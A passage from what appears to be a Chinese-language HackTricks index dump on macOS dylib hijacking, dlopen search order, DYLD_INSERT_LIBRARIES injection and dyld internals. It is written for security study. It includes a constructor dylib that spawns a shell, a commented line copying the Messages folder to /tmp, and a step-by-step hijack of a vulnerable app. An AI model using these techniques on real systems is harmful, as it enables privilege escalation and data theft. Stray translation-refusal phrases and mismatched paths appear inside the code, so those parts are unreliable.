中,您也可以 劫持 dylibs 使 应用程序 执行 任意 代码 (实际上,从普通用户的角度来看,这可能不可行,因为您可能需要 TCC 权限才能在 .app 包内写入并劫持库)。 然而, MacOS 应用程序 加载 库的方式 比 Windows 更受限制 。这意味着 恶意软件 开发者仍然可以使用此技术进行 隐蔽 ,但能够 滥用此技术以提升权限的可能性要低得多 。 首先, 更常见 的情况是 MacOS 二进制文件指示要加载的库的完整路径 。其次, MacOS 从不在 $PATH 的文件夹中搜索库 。 与此功能相关的 主要 代码部分在 ImageLoader::recursiveLoadLibraries 中,位于 ImageLoader.cpp。 macho 二进制文件可以使用 4 种不同的头部命令 来加载库: LC_LOAD_DYLIB 命令是加载 dylib 的常用命令。 LC_LOAD_WEAK_DYLIB 命令的工作方式与前一个相同,但如果未找到 dylib,执行将继续而不会出现错误。 LC_REEXPORT_DYLIB 命令代理(或重新导出)来自不同库的符号。 LC_LOAD_UPWARD_DYLIB 命令在两个库相互依赖时使用(这称为 向上依赖 )。 然而,有 2 种类型的 dylib 劫持 : 缺失的弱链接库 :这意味着应用程序将尝试加载一个不存在的库,该库配置为 LC_LOAD_WEAK_DYLIB 。然后, 如果攻击者在预期加载的位置放置了一个 dylib 。 链接是“弱”的事实意味着即使未找到库,应用程序仍将继续运行。 与此相关的 代码 在 ImageLoaderMachO::doGetDependentLibraries 函数中,lib->required 仅在 LC_LOAD_WEAK_DYLIB 为 true 时为 false。 在二进制文件中查找弱链接库 (稍后您将看到如何创建劫持库的示例): otool -l | grep LC_LOAD_WEAK_DYLIB -A 5 cmd LC_LOAD_WEAK_DYLIB cmdsize 56 name /var/tmp/lib/libUtl.1.dylib (offset 24) time stamp 2 Wed Jun 21 12:23:31 1969 current version 1.0.0 compatibility version 1.0.0 - **配置为 @rpath**:Mach-O 二进制文件可以具有 **`LC_RPATH`** 和 **`LC_LOAD_DYLIB`** 命令。根据这些命令的 **值**,**库** 将从 **不同目录** 加载。\\n- **`LC_RPATH`** 包含用于通过二进制文件加载库的一些文件夹的路径。\\n- **`LC_LOAD_DYLIB`** 包含要加载的特定库的路径。这些路径可以包含 **`@rpath`**,将被 **`LC_RPATH`** 中的值 **替换**。如果 **`LC_RPATH`** 中有多个路径,将使用所有路径来搜索要加载的库。例如:\\n- 如果 **`LC_LOAD_DYLIB`** 包含 `@rpath/library.dylib`,而 **`LC_RPATH`** 包含 `/application/app.app/Contents/Framework/v1/` 和 `/application/app.app/Contents/Framework/v2/`。这两个文件夹将用于加载 `library.dylib`**。** 如果库在 `[...]/v1/` 中不存在,攻击者可以将其放置在那里以劫持在 `[...]/v2/` 中加载库,因为遵循 **`LC_LOAD_DYLIB`** 中路径的顺序。\\n- **在二进制文件中查找 rpath 路径和库**:`otool -l | grep -E \\"LC_RPATH|LC_LOAD_DYLIB\\" -A 5` > [!NOTE] > **`@executable_path`**:是 **主可执行文件** 所在目录的 **路径**。\\n>\\n> **`@loader_path`**:是 **包含** 加载命令的 **Mach-O 二进制文件** 所在 **目录** 的 **路径**。\\n>\\n> - 当在可执行文件中使用时,**`@loader_path`** 实际上与 **`@executable_path`** 是 **相同的**。\\n> - 当在 **dylib** 中使用时,**`@loader_path`** 给出 **dylib** 的 **路径**。 滥用此功能以 **提升权限** 的方式是在 **应用程序** 由 **root** 执行时,**查找** 在攻击者具有写权限的某个文件夹中的 **库**。
\\n

tip\\n

一个很好的 **扫描器** 用于查找应用程序中的 **缺失库** 是 [**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html) 或 [**CLI 版本**](https://github.com/pandazheng/DylibHijack)。\\\\\\n关于此技术的 **技术细节** 的很好的 **报告** 可以在 [**这里**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x) 找到。
**示例** macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES ## Dlopen 劫持
\\n

caution\\n

请记住,**先前的库验证限制也适用于** 执行 Dlopen 劫持攻击。
来自 **`man dlopen`**: - 当路径 **不包含斜杠字符**(即它只是一个叶名称)时,**dlopen() 将进行搜索**。如果 **`$DYLD_LIBRARY_PATH`** 在启动时设置,dyld 将首先 **在该目录中查找**。接下来,如果调用的 mach-o 文件或主可执行文件指定了 **`LC_RPATH`**,则 dyld 将 **在这些** 目录中查找。接下来,如果进程是 **不受限制的**,dyld 将在 **当前工作目录** 中搜索。最后,对于旧二进制文件,dyld 将尝试一些后备方案。如果 **`$DYLD_FALLBACK_LIBRARY_PATH`** 在启动时设置,dyld 将在 **这些目录中搜索**,否则,dyld 将在 **`/usr/local/lib/`** 中查找(如果进程不受限制),然后在 **`/usr/lib/`** 中查找(此信息来自 **`man dlopen`**)。\\n1. `$DYLD_LIBRARY_PATH`\\n2. `LC_RPATH`\\n3. `CWD`(如果不受限制)\\n4. `$DYLD_FALLBACK_LIBRARY_PATH`\\n5. `/usr/local/lib/`(如果不受限制)\\n6. `/usr/lib/`
\\n

caution\\n

如果名称中没有斜杠,则有 2 种方式进行劫持: - 如果任何 **`LC_RPATH`** 是 **可写的**(但签名会被检查,因此为此您还需要二进制文件不受限制)\\n- 如果二进制文件是 **不受限制的**,那么可以从 CWD 加载某些内容(或滥用上述提到的环境变量之一)
- 当路径 **看起来像框架** 路径(例如 `/stuff/foo.framework/foo`)时,如果 **`$DYLD_FRAMEWORK_PATH`** 在启动时设置,dyld 将首先在该目录中查找 **框架部分路径**(例如 `foo.framework/foo`)。接下来,dyld 将尝试 **按原样使用提供的路径**(对相对路径使用当前工作目录)。最后,对于旧二进制文件,dyld 将尝试一些后备方案。如果 **`$DYLD_FALLBACK_FRAMEWORK_PATH`** 在启动时设置,dyld 将在这些目录中搜索。否则,它将搜索 **`/Library/Frameworks`**(在 macOS 上,如果进程不受限制),然后 **`/System/Library/Frameworks`**。\\n1. `$DYLD_FRAMEWORK_PATH`\\n2. 提供的路径(如果不受限制,则对相对路径使用当前工作目录)\\n3. `$DYLD_FALLBACK_FRAMEWORK_PATH`\\n4. `/Library/Frameworks`(如果不受限制)\\n5. `/System/Library/Frameworks`
\\n

caution\\n

如果是框架路径,劫持的方式将是: - 如果进程是 **不受限制的**,滥用 **相对路径从 CWD** 和提到的环境变量(即使文档中没有说明,如果进程受限制,DYLD_* 环境变量会被移除)
- 当路径 **包含斜杠但不是框架路径**(即到 dylib 的完整路径或部分路径)时,dlopen() 首先在(如果设置) **`$DYLD_LIBRARY_PATH`** 中查找(使用路径的叶部分)。接下来,dyld **尝试提供的路径**(对相对路径使用当前工作目录(但仅适用于不受限制的进程))。最后,对于旧二进制文件,dyld 将尝试后备方案。如果 **`$DYLD_FALLBACK_LIBRARY_PATH`** 在启动时设置,dyld 将在这些目录中搜索,否则,dyld 将在 **`/usr/local/lib/`** 中查找(如果进程不受限制),然后在 **`/usr/lib/`** 中查找。\\n1. `$DYLD_LIBRARY_PATH`\\n2. 提供的路径(如果不受限制,则对相对路径使用当前工作目录)\\n3. `$DYLD_FALLBACK_LIBRARY_PATH`\\n4. `/usr/local/lib/`(如果不受限制)\\n5. `/usr/lib/`
\\n

caution\\n

如果名称中有斜杠且不是框架,则劫持的方式将是: - 如果二进制文件是 **不受限制的**,那么可以从 CWD 或 `/usr/local/lib` 加载某些内容(或滥用上述提到的环境变量之一)
\\n

tip\\n

注意:没有配置文件来 **控制 dlopen 搜索**。 注意:如果主可执行文件是 **set\\\\[ug]id 二进制文件或具有权限的代码签名**,则 **所有环境变量都将被忽略**,只能使用完整路径([检查 DYLD_INSERT_LIBRARIES 限制](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions)以获取更详细的信息)。 注意:Apple 平台使用“通用”文件来组合 32 位和 64 位库。这意味着没有 **单独的 32 位和 64 位搜索路径**。 注意:在 Apple 平台上,大多数操作系统 dylibs 被 **组合到 dyld 缓存中**,并且在磁盘上不存在。因此,调用 **`stat()`** 以预检操作系统 dylib 是否存在 **将不起作用**。然而,**`dlopen_preflight()`** 使用与 **`dlopen()`** 相同的步骤来查找兼容的 mach-o 文件。
**检查路径** 让我们使用以下代码检查所有选项: // gcc dlopentest.c -o dlopentest -Wl,-rpath,/tmp/test #include #include int main(void) { void* handle; fprintf(\\"--- No slash ---\\\\n\\"); handle = dlopen(\\"just_name_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Relative framework ---\\\\n\\"); handle = dlopen(\\"a/framework/rel_framework_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Abs framework ---\\\\n\\"); handle = dlopen(\\"/a/abs/framework/abs_framework_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Relative Path ---\\\\n\\"); handle = dlopen(\\"a/folder/rel_folder_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Abs Path ---\\\\n\\"); handle = dlopen(\\"/a/abs/folder/abs_folder_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } return 0; } 如果你编译并执行它,你可以看到**每个库被搜索但未成功找到的位置**。此外,你还可以**过滤文件系统日志**: sudo fs_usage | grep \\"dlopentest\\" ## 相对路径劫持 如果一个 **特权二进制文件/应用程序**(如 SUID 或某些具有强大权限的二进制文件)正在 **加载相对路径** 库(例如使用 `@executable_path` 或 `@loader_path`)并且 **禁用库验证**,攻击者可能会将二进制文件移动到一个位置,在那里攻击者可以 **修改相对路径加载的库**,并利用它在进程中注入代码。 ## 修剪 `DYLD_*` 和 `LD_LIBRARY_PATH` 环境变量 在文件 `dyld-dyld-832.7.1/src/dyld2.cpp` 中,可以找到函数 **`pruneEnvironmentVariables`**,该函数将删除任何 **以 `DYLD_`** 和 **`LD_LIBRARY_PATH=`** 开头的环境变量。 它还将特定地将环境变量 **`DYLD_FALLBACK_FRAMEWORK_PATH`** 和 **`DYLD_FALLBACK_LIBRARY_PATH`** 设置为 **null**,适用于 **suid** 和 **sgid** 二进制文件。 如果目标是 OSX,该函数会从同一文件的 **`_main`** 函数中调用,如下所示: #if TARGET_OS_OSX if ( !gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache ) { pruneEnvironmentVariables(envp, &apple); 这些布尔标志在代码中的同一文件中设置: #if TARGET_OS_OSX // support chrooting from old kernel bool isRestricted = false; bool libraryValidation = false; // any processes with setuid or setgid bit set or with __RESTRICT segment is restricted if ( issetugid() || hasRestrictedSegment(mainExecutableMH) ) { isRestricted = true; } bool usingSIP = (csr_check(CSR_ALLOW_TASK_FOR_PID) != 0); uint32_t flags; if ( csops(0, CS_OPS_STATUS, &flags, sizeof(flags)) != -1 ) { // On OS X CS_RESTRICT means the program was signed with entitlements if ( ((flags & CS_RESTRICT) == CS_RESTRICT) && usingSIP ) { isRestricted = true; } // Library Validation loosens searching but requires everything to be code signed if ( flags & CS_REQUIRE_LV ) { isRestricted = false; libraryValidation = true; } } gLinkContext.allowAtPaths = !isRestricted; gLinkContext.allowEnvVarsPrint = !isRestricted; gLinkContext.allowEnvVarsPath = !isRestricted; gLinkContext.allowEnvVarsSharedCache = !libraryValidation || !usingSIP; gLinkContext.allowClassicFallbackPaths = !isRestricted; gLinkContext.allowInsertFailures = false; gLinkContext.allowInterposing = true; 这基本上意味着,如果二进制文件是 **suid** 或 **sgid**,或者在头文件中有 **RESTRICT** 段,或者它是用 **CS_RESTRICT** 标志签名的,那么 **`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** 为真,环境变量将被修剪。 请注意,如果 CS_REQUIRE_LV 为真,则变量不会被修剪,但库验证将检查它们是否使用与原始二进制文件相同的证书。 ## 检查限制 ### SUID & SGID","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Dylib 劫持","id":"2497","title":"Dylib 劫持"},"2498":{"body":"sudo chown root hello sudo chmod +s hello","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Make it owned by root and suid","id":"2498","title":"Make it owned by root and suid"},"2499":{"body":"DYLD_INSERT_LIBRARIES=inject.dylib ./hello","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Insert the library","id":"2499","title":"Insert the library"},"25":{"body":"Hacktricks logos designed by @ppiernacho .","breadcrumbs":"Pentesting Methodology » Pentesting Methodology","id":"25","title":"Pentesting Methodology"},"250":{"body":"Palo Alto Unit42 – Infiltration of Global Telecom Networks 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) 3GPP TS 29.281 – GTPv2-C (v17.6.0) Demystifying 5G Security: Understanding the Registration Protocol 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS 3GPP TS 33.501 – Security architecture and procedures for 5G System tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » References","id":"250","title":"References"},"2500":{"body":"sudo chmod -s hello ### Section `__RESTRICT` with segment `__restrict` gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict ### Hardened runtime 在钥匙串中创建一个新证书,并使用它来签署二进制文件:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Remove suid","id":"2500","title":"Remove suid"},"2501":{"body":"codesign -s --option=runtime ./hello DYLD_INSERT_LIBRARIES=inject.dylib ./hello #Library won\'t be injected","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Apply runtime proetction","id":"2501","title":"Apply runtime proetction"},"2502":{"body":"codesign -f -s --option=library ./hello DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed #Will throw an error because signature of binary and library aren\'t signed by same cert (signs must be from a valid Apple-signed developer certificate)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Apply library validation","id":"2502","title":"Apply library validation"},"2503":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Sign it","id":"2503","title":"Sign it"},"2504":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » If the signature is from an unverified developer the injection will still work","id":"2504","title":"If the signature is from an unverified developer the injection will still work"},"2505":{"body":"codesign -f -s inject.dylib DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » If it\'s from a verified developer, it won\'t","id":"2505","title":"If it\'s from a verified developer, it won\'t"},"2506":{"body":"codesign -f -s --option=restrict hello-signed DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won\'t work","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Apply CS_RESTRICT protection","id":"2506","title":"Apply CS_RESTRICT protection"},"2507":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES","id":"2507","title":"macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES"},"2508":{"body":"要注入的库 以执行 shell: c // gcc -dynamiclib -o inject.dylib inject.c #include \\n#include \\n#include \\n#include \\n__attribute__((constructor)) void myconstructor(int argc, const char **argv)\\n{\\nsyslog(LOG_ERR, \\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nprintf(\\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nexecv(\\"/bin/bash\\", 0);\\n//system(\\"cp -r ~/Library/Messages/ /tmp/Messages/\\");\\n} 二进制攻击目标: c // gcc hello.c -o hello\\n#include int main()\\n{\\nprintf(\\"Hello, World!\\\\n\\");\\nreturn 0;\\n} 注入: bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » DYLD_INSERT_LIBRARIES 基本示例","id":"2508","title":"DYLD_INSERT_LIBRARIES 基本示例"},"2509":{"body":"目标易受攻击的二进制文件是 /Applications/VulnDyld.app/Contents/Resources/lib/binary。 entitlements\\nLC_RPATH\\n@rpath codesign -dv --entitlements :- \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n[...]com.apple.security.cs.disable-library-validation[...] bash # Check where are the @rpath locations\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep LC_RPATH -A 2\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/. (offset 12)\\n--\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/../lib2 (offset 12) bash # Check librareis loaded using @rapth and the used versions\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep \\"@rpath\\" -A 3\\nname @rpath/lib.dylib (offset 24)\\ntime stamp 2 Thu Jan 1 01:00:02 1970\\ncurrent version 1.0.0\\ncompatibility version 1.0.0\\n# Check the versions 根据之前的信息,我们知道它 没有检查加载库的签名 ,并且 尝试从以下位置加载库 : /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib 然而,第一个库并不存在: bash pwd\\n/Applications/VulnDyld.app find ./ -name lib.dylib\\n./Contents/Resources/lib2/lib.dylib 所以,可以劫持它!创建一个库, 执行一些任意代码并通过重新导出相同的功能 来导出与合法库相同的功能。并记得使用预期的版本进行编译: lib.m #import __attribute__((constructor))\\nvoid custom(int argc, const char **argv) {\\nNSLog(@\\"[+] dylib hijacked in %s\\", argv[0]);\\n} 抱歉,我无法满足该请求。 bash gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,\\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" -o \\"/tmp/lib.dylib\\"\\n# Note the versions and the reexport 在库中创建的重新导出路径是相对于加载器的,让我们将其更改为库的绝对路径以进行导出: bash #Check relative\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 48\\nname @rpath/libjli.dylib (offset 24) #Change the location of the library absolute to absolute path\\ninstall_name_tool -change @rpath/lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" /tmp/lib.dylib # Check again\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 128\\nname /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) 最后将其复制到 hijacked location : bash cp lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib\\" 并 执行 二进制文件并检查 库是否已加载 : \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary\\nUsage: [...] note 关于如何利用此漏洞滥用 Telegram 的相机权限的详细说明可以在 https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/ 中找到。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » Dyld 劫持示例","id":"2509","title":"Dyld 劫持示例"},"251":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 此问题在以下博客文章中发现: https://www.rtcsec.com/article/novel-dos-vulnerability-affecting-webrtc-media-servers/ 在WebRTC媒体服务器中描述的漏洞源于媒体会话初始化期间的 竞争条件 ,具体是在 ICE媒体同意验证 和 DTLS流量初始化 之间。以下是详细的分解:","breadcrumbs":"Pentesting Network » WebRTC DoS » WebRTC DoS","id":"251","title":"WebRTC DoS"},"2510":{"body":"如果您计划尝试在意外的二进制文件中注入库,您可以检查事件消息以找出库何时在进程中加载(在这种情况下,删除 printf 和 /bin/bash 执行)。 bash sudo log stream --style syslog --predicate \'eventMessage CONTAINS[c] \\"[+] dylib\\"\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » 更大规模","id":"2510","title":"更大规模"},"2511":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » macOS Dyld 进程","id":"2511","title":"macOS Dyld 进程"},"2512":{"body":"Mach-o 二进制文件的真正 入口点 是动态链接的,定义在 LC_LOAD_DYLINKER 中,通常是 /usr/lib/dyld。 这个链接器需要定位所有可执行库,将它们映射到内存中,并链接所有非惰性库。只有在这个过程完成后,二进制文件的入口点才会被执行。 当然, dyld 没有任何依赖(它使用系统调用和 libSystem 摘录)。 caution 如果这个链接器包含任何漏洞,因为它在执行任何二进制文件(即使是高度特权的)之前被执行,那么就有可能 提升权限 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 基本信息","id":"2512","title":"基本信息"},"2513":{"body":"Dyld 将由 dyldboostrap::start 加载,这也会加载诸如 栈金丝雀 之类的内容。这是因为这个函数将在其 apple 参数向量中接收这些和其他 敏感 值 。 dyls::_main() 是 dyld 的入口点,它的第一个任务是运行 configureProcessRestrictions(),通常会限制 DYLD_* 环境变量,具体解释如下: macOS Library Injection 然后,它映射 dyld 共享缓存,该缓存预链接所有重要的系统库,然后映射二进制文件所依赖的库,并递归继续,直到所有所需的库都被加载。因此: 它开始加载插入的库,使用 DYLD_INSERT_LIBRARIES(如果允许) 然后是共享缓存的库 然后是导入的库 然后继续递归导入库 一旦所有库都加载完成,这些库的 初始化器 将被运行。这些是使用 __attribute__((constructor)) 编写的,定义在 LC_ROUTINES[_64](现已弃用)中,或通过指针在标记为 S_MOD_INIT_FUNC_POINTERS 的部分中(通常是: __DATA.__MOD_INIT_FUNC )。 终结器使用 __attribute__((destructor)) 编写,并位于标记为 S_MOD_TERM_FUNC_POINTERS 的部分中( __DATA.__mod_term_func )。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 流程","id":"2513","title":"流程"},"2514":{"body":"macOS 中的所有二进制文件都是动态链接的。因此,它们包含一些存根部分,帮助二进制文件在不同机器和上下文中跳转到正确的代码。当二进制文件被执行时,dyld 是需要解析这些地址的“大脑”(至少是非惰性地址)。 二进制文件中的一些存根部分: __TEXT.__[auth_]stubs :来自 __DATA 部分的指针 __TEXT.__stub_helper :调用动态链接的小代码,包含要调用的函数的信息 __DATA.__[auth_]got :全局偏移表(导入函数的地址,当解析时,(在加载时绑定,因为它标记为 S_NON_LAZY_SYMBOL_POINTERS)) __DATA.__nl_symbol_ptr :非惰性符号指针(在加载时绑定,因为它标记为 S_NON_LAZY_SYMBOL_POINTERS) __DATA.__la_symbol_ptr :惰性符号指针(在首次访问时绑定) warning 请注意,前缀为 \\"auth_\\" 的指针使用一个进程内加密密钥进行保护(PAC)。此外,可以使用 arm64 指令 BLRA[A/B] 在跟随指针之前验证它。而 RETA[A/B] 可以用作 RET 地址。 实际上, __TEXT.__auth_stubs 中的代码将使用 braa 而不是 bl 来调用请求的函数以验证指针。 还要注意,当前的 dyld 版本将 所有内容都加载为非惰性 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 存根","id":"2514","title":"存根"},"2515":{"body":"c //gcc load.c -o load\\n#include \\nint main (int argc, char **argv, char **envp, char **apple)\\n{\\nprintf(\\"Hi\\\\n\\");\\n} 有趣的反汇编部分: armasm ; objdump -d ./load\\n100003f7c: 90000000 adrp\\tx0, 0x100003000 <_main+0x1c>\\n100003f80: 913e9000 add\\tx0, x0, #4004\\n100003f84: 94000005 bl\\t0x100003f98 <_printf+0x100003f98> 可以看到跳转到调用 printf 的位置是 __TEXT.__stubs : bash objdump --section-headers ./load ./load:\\tfile format mach-o arm64 Sections:\\nIdx Name Size VMA Type\\n0 __text 00000038 0000000100003f60 TEXT\\n1 __stubs 0000000c 0000000100003f98 TEXT\\n2 __cstring 00000004 0000000100003fa4 DATA\\n3 __unwind_info 00000058 0000000100003fa8 DATA\\n4 __got 00000008 0000000100004000 DATA 在**__stubs**部分的反汇编中: bash objdump -d --section=__stubs ./load ./load:\\tfile format mach-o arm64 Disassembly of section __TEXT,__stubs: 0000000100003f98 <__stubs>:\\n100003f98: b0000010 adrp\\tx16, 0x100004000 <__stubs+0x4>\\n100003f9c: f9400210 ldr\\tx16, [x16]\\n100003fa0: d61f0200 br\\tx16 你可以看到我们正在 跳转到GOT的地址 ,在这种情况下,它是非懒惰解析的,并将包含printf函数的地址。 在其他情况下,可能不是直接跳转到GOT,而是跳转到**__DATA.__la_symbol_ptr ,这将加载一个表示它试图加载的函数的值,然后跳转到 __TEXT.__stub_helper ,该函数跳转到 __DATA.__nl_symbol_ptr ,其中包含 dyld_stub_binder 的地址,该函数将函数编号和地址作为参数。 这个最后的函数在找到所搜索函数的地址后,将其写入 __TEXT.__stub_helper**中的相应位置,以避免将来进行查找。 tip 但是请注意,当前的dyld版本将所有内容加载为非懒惰。 Dyld操作码 最后,**dyld_stub_binder**需要找到指定的函数并将其写入正确的地址,以便不再搜索它。为此,它在dyld中使用操作码(有限状态机)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 查找惰性符号","id":"2515","title":"查找惰性符号"},"2516":{"body":"在macOS中,主函数实际上接收4个参数而不是3个。第四个被称为apple,每个条目都是key=value的形式。例如: c // gcc apple.c -o apple\\n#include \\nint main (int argc, char **argv, char **envp, char **apple)\\n{\\nfor (int i=0; apple[i]; i++)\\nprintf(\\"%d: %s\\\\n\\", i, apple[i])\\n} 请提供需要翻译的具体内容。 0: executable_path=./a\\n1:\\n2:\\n3:\\n4: ptr_munge=\\n5: main_stack=\\n6: executable_file=0x1a01000012,0x5105b6a\\n7: dyld_file=0x1a01000012,0xfffffff0009834a\\n8: executable_cdhash=757a1b08ab1a79c50a66610f3adbca86dfd3199b\\n9: executable_boothash=f32448504e788a2c5935e372d22b7b18372aa5aa\\n10: arm64e_abi=os\\n11: th_port= tip 到这些值到达主函数时,敏感信息已经从中删除,否则就会发生数据泄露。 可以在进入主函数之前通过调试查看所有这些有趣的值: lldb ./apple (lldb) target create \\"./a\\"\\n当前可执行文件设置为 \'/tmp/a\' (arm64)。\\n(lldb) process launch -s\\n[..] (lldb) mem read $sp\\n0x16fdff510: 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 ................\\n0x16fdff520: d8 f6 df 6f 01 00 00 00 00 00 00 00 00 00 00 00 ...o............ (lldb) x/55s 0x016fdff6d8\\n[...]\\n0x16fdffd6a: \\"TERM_PROGRAM=WarpTerminal\\"\\n0x16fdffd84: \\"WARP_USE_SSH_WRAPPER=1\\"\\n0x16fdffd9b: 